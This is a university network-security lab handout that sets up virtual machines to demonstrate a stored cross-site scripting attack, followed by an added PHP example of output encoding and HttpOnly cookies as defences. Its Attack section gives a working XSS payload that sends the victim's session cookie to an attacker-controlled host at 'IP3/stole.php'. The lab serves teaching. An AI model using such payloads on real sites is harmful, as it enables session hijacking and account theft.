LAB X: Cross Site Scripting Attack: Vul Server (IP1)

This document provides instructions for setting up a network with three virtual machines to demonstrate a cross-site scripting (XSS) attack. It describes configuring an Apache web server with PHP and MySQL enabled on the "Secure Server" machine. Files like index.php and login.php are copied to directories to implement a login system. The "User Machine" and "Attacker Machine" have Firefox installed. Normally a user must log in correctly to view protected pages, but the attacker aims to steal the user's session ID through an XSS vulnerability in a file called xssvul.php. Entering malicious JavaScript code into that page allows stealing and viewing the user's cookie.
Copyright
© Attribution Non-Commercial (BY-NC)

INTERNATIONAL UNIVERSITY
School of Computer Science and Engineering

LAB x: Cross Site Scripting Attack

Course: Network and System Security
Date:
Lecturer: Pham Van Hau, PhD
Duration: 135 minutes

Student ID: ....................    Student name: ....................

Introduction

[Figure 1: Vul Server (IP1), User Machine (IP2), Hacker (IP3)]

Set up a network that consists of three virtual machines (as depicted in Figure 1) in which Secure Server is a web server powered by Apache with PHP and MySQL enabled.

In the home directory of your web server (for Apache, it is /var/www/):

Create the directory called “admin” (/var/www/admin).
Copy three files index.php, login.php, and protected.php to /var/www/admin.
Copy the xssvul.php to /var/www/.
Create the messages table in the MySQL server: log in to your MySQL server and run

    CREATE TABLE IF NOT EXISTS `messages` (
      `NAME` varchar(30),
      `Message` longtext
    ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=13 ;

User and Attacker are two machines with Firefox installed. Normally, you need to enter the correct username and password in the login.php page in order to load the protected.php page. The attacker (on the attacker machine) does not know the username and password of the secure server.

Normal Operation

From machine “User Machine”, enter http://ip1/admin/index.php in the web browser bar. Enter the username as “xss” and “pass” as password. After you enter the correct username and password, the web server creates a session identification and gives it to the web browser. Every time the web browser wants to view http://ip1/admin/protected.php, it must show the session identification. To view the session identification, you can enter “javascript:alert(document.cookie)” in the browsing bar of your web browser.

Attack

From the attacker machine, the attacker wants to steal the session identification of the user from “User Machine”. This can be done thanks to the XSS vulnerability of the page http://ip1/xssvul.php. Indeed, try entering the following information into the page:

    Name=Test
    Message=<javascript> alert("test")</javascript>

Now, try entering the following text into the message box and click on “Click here”:

    <a href="#" onclick="window.location='http://IP3/stole.php?text='+escape(document.cookie); return false;">Click here</a>

(Stole.php saves the cookie)
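The defensive counterpart to the attack step, as an added example that is not part of the original handout: it shows why the message box input executes and how output encoding plus an HttpOnly session cookie stop the cookie from being read. The source of xssvul.php is not shown in the lab, so the rendering functions, the sample rows and the function names below are assumptions made for illustration.

```php
<?php
// Added example: NOT the lab's xssvul.php, whose source the handout does not show.
// Assumption: the page prints the NAME and Message columns of the messages table.

// Constructed rows holding the two inputs the lab asks you to submit.
$rows = [
    ['NAME' => 'Test', 'Message' => '<javascript> alert("test")</javascript>'],
    ['NAME' => 'Test', 'Message' => '<a href="#" onclick="window.location='
        . "'http://IP3/stole.php?text='+escape(document.cookie); return false;\">Click here</a>"],
];

// Vulnerable pattern: stored input is concatenated into HTML unchanged, so the
// browser parses it as markup and the onclick handler becomes live.
function render_unsafe(array $row): string
{
    return '<p><b>' . $row['NAME'] . '</b>: ' . $row['Message'] . '</p>';
}

// Encode the HTML-significant characters (& < > " ') at output time.
function enc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: every stored value is encoded for the HTML context, so the
// browser displays the input as text instead of building elements from it.
function render_safe(array $row): string
{
    return '<p><b>' . enc($row['NAME']) . '</b>: ' . enc($row['Message']) . '</p>';
}

// Defence in depth for the login pages: flag the session cookie HttpOnly so
// that document.cookie cannot read it. Must run before session_start().
function start_hardened_session(): void
{
    session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
    session_start();
}

// Print both renderings of each constructed row for comparison.
foreach ($rows as $row) {
    echo 'unsafe: ', render_unsafe($row), PHP_EOL;
    echo 'safe:   ', render_safe($row), PHP_EOL, PHP_EOL;
}
```

In the "safe" lines the submitted markup appears as `&lt;a href=&quot;#&quot; ...`, which the browser renders as literal text. The array form of `session_set_cookie_params` requires PHP 7.3 or later.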
